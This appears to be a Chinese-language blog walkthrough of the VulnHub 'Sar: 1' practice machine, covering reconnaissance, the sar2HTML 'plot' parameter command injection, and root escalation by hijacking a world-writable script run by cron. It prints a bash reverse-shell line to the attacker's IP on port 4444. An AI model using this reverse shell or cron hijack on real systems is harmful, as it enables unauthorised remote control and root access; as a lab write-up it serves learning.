靶機滲透之sar

  • Name: Sar: 1
  • Date release: 15 Feb 2020
  • Author:?Love
  • Series:?Sar
  • Download:?https://drive.google.com/open?id=1AFAmM21AwiAEiVFUA0cSr_GeAYaxd3lQ

對于vulnhub中的靶機,我們都需先下載鏡像,然后導入VM,并將網絡連接改為NAT模式。首先我們再來看一下靶機滲透的步驟:信息收集-漏洞分析-漏洞利用-提權。基本都是這個三個步驟,接下來開始我們今天的靶機滲透吧!?

信息收集

主機發現

端口掃描

由掃描結果可以得知只有一個端口開放。

目錄掃描

掃出來兩個文件phpinfo.php和robots.txt。后續可以關注一下!

漏洞掃描

沒掃出常見的漏洞!!

漏洞分析

打開頁面,沒啥發現。

?打開目錄掃描出來的一個文件robots.txt。發現出來"sar2HTML"

使用kali 搜索一下目前存在已知的sar2html漏洞,發現存在RCE漏洞

把掃描結果總結一下:

  1. 漏洞標題:sar2html 3.2.1 - 'plot' 遠程代碼執行
    路徑:php/webapps/49344.py
  2. 漏洞標題:Sar2HTML 3.2.1 - 遠程命令執行
    路徑:php/webapps/47204.txt

第一個漏洞利用版本3.2.1中的'plot'功能實現了遠程代碼執行。第二個漏洞實現了遠程命令執行。提供的文件路徑指示了漏洞在Searchsploit數據庫中的位置。

這兩個漏洞之間有以下區別:

漏洞類型:第一個漏洞是遠程代碼執行漏洞,而第二個漏洞是遠程命令執行漏洞。遠程代碼執行漏洞允許攻擊者在目標系統上執行惡意代碼,而遠程命令執行漏洞則允許攻擊者在目標系統上執行任意命令。

漏洞利用方式:第一個漏洞利用的是sar2html版本3.2.1中的'plot'功能,通過該功能觸發遠程代碼執行。第二個漏洞的具體利用方式沒有在提供的信息中給出。

將sar2html利用的腳本拷貝至本地。

當使用sar2html版本3.2.1時,存在一個遠程代碼執行漏洞。這個漏洞允許攻擊者通過在URL中注入惡意命令來執行任意代碼。通過在plot參數中注入惡意代碼,攻擊者可以執行系統命令,并在受影響的服務器上執行任意操作。

查看利用方式,可以發現利用的地方在于plot的入參處。

告訴我們index.php 的參數plot 值使用分號隔開后加上系統命令造成遠程命令執行
我們嘗試一下,成功。

漏洞利用-遠程代碼執行

先開啟http服務

上傳shell腳本

給腳本執行的權限

先在kali開啟監聽端口1234,執行一下腳本。

反彈成功

提權

拿到shell后首先嘗試了sudo -l,沒有成功。到網站的根目錄下看一下有什么文件

發現了兩個特殊文件 finally.sh,robots.txt這兩個文件屬于rootwrite.sh這個文件具有777權限。查看一下這三個文件里面的內容。

可以發現finally.sh里的內容就是執行write.sh文件,而write.sh文件的作用就是創建一個文件?/tmp/gateway。由此可以想到計劃任務提權,查看一下定時任務的配置文件/etc/crontab

果然有發現,系統會每五分鐘就以root權限執行finally.sh

現在將反彈shell的代碼寫入write.sh中。

echo '#!/bin/sh' > write.shecho 'bash -c "bash -i >& /dev/tcp/192.168.11.128/4444 0>&1"' >>write.sh

在kali開啟監聽端口4444

靜等5分鐘 ,收到靶機連上反彈shell,確認用戶為root.切換到root目錄下,發現有文件root.txt。找到了flag.靶機到此就滲透完成!

總結

靶機滲透過程也就分為那幾步驟,首先就是信息收集,找ip,端口,目錄,漏洞。然后就進行漏洞分析,在進行漏洞分析的時候使用到了kali中自帶的工具searchsploit,使用它搜索sar2HTML存在的漏洞,然后將漏洞利用腳本拷貝到本地,最后得知漏洞利用方式。最后就利用遠程代碼執行漏洞,上傳反彈shell腳本,上傳腳本一直出問題,也不知道為啥,最后上傳了個shell.py,反彈成功。然后就是最后提權部分,利用了計劃任務提權,獲取root權限的關鍵是finally.sh腳本以root用戶的權限來執行。finally.sh 執行寫好的反彈shell腳本,執行腳本時繼承了finally.sh的root權限,得到的反彈shell即為root權限shell。以上就是整個靶機滲透過程,如有問題還請大家幫忙指出!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/710609.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/710609.shtml
英文地址,請注明出處:http://en.pswp.cn/news/710609.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

UDP數據報套接字編程入門

目錄 1.TCP和UDP的特點及區別 1.1TCP的特點 1.2UDP的特點 1.3區別 2.UDP Socket的api的介紹 2.1DatagramSocket API 2.2DatagramPacket API 3.回顯客戶端與服務器 3.1回顯服務器 3.1.1UdpEchoServer類的創建 3.1.2服務器的運行方法start() 3.1.3main部分 3.1.4.完整…

C# CAD PaletteSet.Style各種外觀和行為樣式

ps.Style 是 Autodesk.AutoCAD.Windows.PaletteSet 類的一個屬性,用于定義調色板集(PaletteSet)的各種外觀和行為樣式。它可以是 PaletteSetStyles 枚舉類型的組合值 PaletteSetStyles 枚舉中包含以下一些選項: NameEditable&am…

統計子矩陣

一、題目描述 P8783 [藍橋杯 2022 省 B] 統計子矩陣 二、算法簡析 2.1 二維前綴和 我們知道,只要確定了矩陣的左上頂點和右下頂點,一個矩陣就被固定了。因此,我們可以遍歷這兩個頂點,達到遍歷所有子矩陣的目的,復雜…

AutoSAR(基礎入門篇)12.5-Dem

目錄 一、Dem簡介 二、Dem消抖 1、計數模式 1. 普通增減計數 2. 反向歸零增減模式

在微服務整合dubbo,以為微服務版的若依為例

在微服務整合dubbo,以為微服務版的若依為例 一、環境二、整合過程1、父模塊依賴2、生產者3、消費者 三、修改若依的服務調用方式為dubbo1、改造系統模塊2、改造認證授權中心 四、整合過程遇到的問題1、出現循環引用2、出現依賴沖突3、啟動出現端口號被占用4、出現某…

UVa11726 Crime Scene

題目鏈接 UVa11726 - Crime Scene 題意 給定n(n≤100)個物體,每個物體都是一個圓或者k(k≤10)邊形,用長度盡量小的繩子把它們包圍起來。 分析 孟加拉國Manzurur Rahman Khan (Sidky)大神出的難題&#xff…

MySQL 核心模塊揭秘 | 07 期 | 二階段提交 (1) prepare 階段

二階段提交的 prepare 階段,binlog 和 InnoDB 各自會有哪些動作? 本文基于 MySQL 8.0.32 源碼,存儲引擎為 InnoDB。 1. 二階段提交 二階段提交,顧名思義,包含兩個階段,它們是: prepare 階段。…

springboot-基礎-eclipse配置+helloword示例

備份筆記。所有代碼都是2019年測試通過的,如有問題請自行搜索解決! 下一篇:springboot-基礎-添加model和controller的簡單例子常用注解含義 目錄 配置helloword示例新建項目創建文件 配置 spring boot官方有定制版eclipse,也就是…

BUUCTF AWD-Test1

打開靶場是這個有些簡陋的界面。 隨便點點,找到這個東西。 看到ThinkPHP,思路瞬間清晰,老熟人了。這個就是ThinkPHP漏洞。根據版本我們去找一下poc。 /index.php/?sIndex/\think\View/display&content%22%3C?%3E%3C?php%20phpinfo();…

SHELL 腳本: 導出NEO4j DUMP并上傳SFTP

前提 開通sftp賬號 安裝expect 示例 NEO4J_HOME/path/to/neo4j # neo4j 安裝目錄 DUMP_PATH/data/dump # DUMP本地保存目錄 DUMP_FILEneo4j_$(date %F).dump #導出文件名稱 UPLOAD_DIR/path/to/stfp/dump/ #上傳目錄 $NEO4J_HOME/bin/neo4j-admin dump --databaseneo4j --t…

Vue-5

Vue 3 的優勢 更容易維護(組合式API)更快的速度更小的體積更優的數據響應 創建 Vue 3 項目 前提環境條件:已安裝 16.0 或更高版本的 Node.js node -v創建一個 Vue 應用(下面的指令將會安裝并執行 create-vue ) np…

服務端向客戶端推送數據的實現方案

在日常的開發中,我們經常能碰見服務端需要主動推送給客戶端數據的業務場景,比如數據大屏的實時數據,比如消息中心的未讀消息,比如聊天功能等等。 本文主要介紹SSE的使用場景和如何使用SSE。 服務端向客戶端推送數據的實現方案有哪…

MySQL 自增列解析(Auto_increment)

MySQL數據庫為列提供了一種自增屬性,當列被定義為自增時。Insert語句對該列即使不提供值,MySQL也會自動為該列生成遞增的唯一標識,因此這個特性廣泛用于主鍵的自動生成。 一、自增列的用法 自增列具有自動生成序列值,整型&#…

職責鏈模式(Chain of Responsibility Pattern)

定義 職責鏈模式(Chain of Responsibility Pattern)是一種行為設計模式,它允許對象接收請求并將其沿著處理者鏈傳遞,直到有一個處理者處理它為止。職責鏈模式通過將請求的處理邏輯分布 在職責鏈模式中,通常包含以下幾…

MYSQL04高級_邏輯架構剖析、查詢緩存、解析器、優化器、執行器、存儲引擎

文章目錄 ①. 邏輯架構剖析②. 服務層 - 查詢緩存③. 服務層 - 解析器④. 服務層 - 優化器⑤. 服務層 - 執行器⑥. MySQL8執行原理 ①. 邏輯架構剖析 ①. 服務器處理客戶端請求 ②. 連接層 系統(客戶端)訪問MySQL服務器前,做的第一件事就是建立TCP連接經過三次握手建立連接成…

Linux使用C語言實現通過互斥鎖限制對共享資源的訪問

互斥鎖限制共享資源的訪問 主線程中有兩個線程&#xff0c;分別輸出信息。 #include <stdio.h> #include <pthread.h> #include <unistd.h>int g_data0;void* fun1(void *arg) {printf("t1&#xff1a;%ld thread is create\n", (unsigned long)…

大宋咨詢數據研究在汽車新品上市中的核心作用

隨著汽車行業的快速變革&#xff0c;數據研究已經成為新品上市流程中的不可或缺的一環。從市場定位、產品規劃到營銷策略&#xff0c;數據研究不僅為汽車企業提供了獨特的洞察&#xff0c;還為其提供了決策依據&#xff0c;確保新品在競爭激烈的市場中取得優勢。在這一領域&…

Kubernetes IoTDB系列 | IoTDB搭建 | v1.3.0

目錄 一、IoTDB 介紹二、k8s 部署 IoTDB一、IoTDB 介紹 IoTDB 是一種面向物聯網(IoT)場景的開源時序數據庫。它專門設計用于高效地存儲和查詢大規模物聯網設備產生的時序數據。IoTDB 提供了高吞吐量、低延遲、靈活的數據模型以及多種數據查詢和存儲引擎等特性,使其成為處理…

稀疏圖帶負邊的全源最短路Johnson算法

BellmanFord算法 Johnson算法解決的問題 帶負權的稀疏圖的全源最短路 算法流程 重新設置的每條邊的權重都大于或等于0&#xff0c;跑完Djikstra后得到的全源最短路&#xff0c;記得要還原&#xff0c;即&#xff1a;f(u,v) d(u,v) - h[u] h[v] 例題

45、WEB攻防——通用漏洞PHP反序列化POP鏈構造魔術方法原生類

文章目錄 序列化&#xff1a;將java、php等代碼中的對象轉化為數組或字符串等格式。代表函數serialize()&#xff0c;將一個對象轉換成一個字符&#xff1b;反序列化&#xff1a;將數組或字符串等格式還成對象。代表函數unserialize()&#xff0c;將字符串還原成一個對象。 P…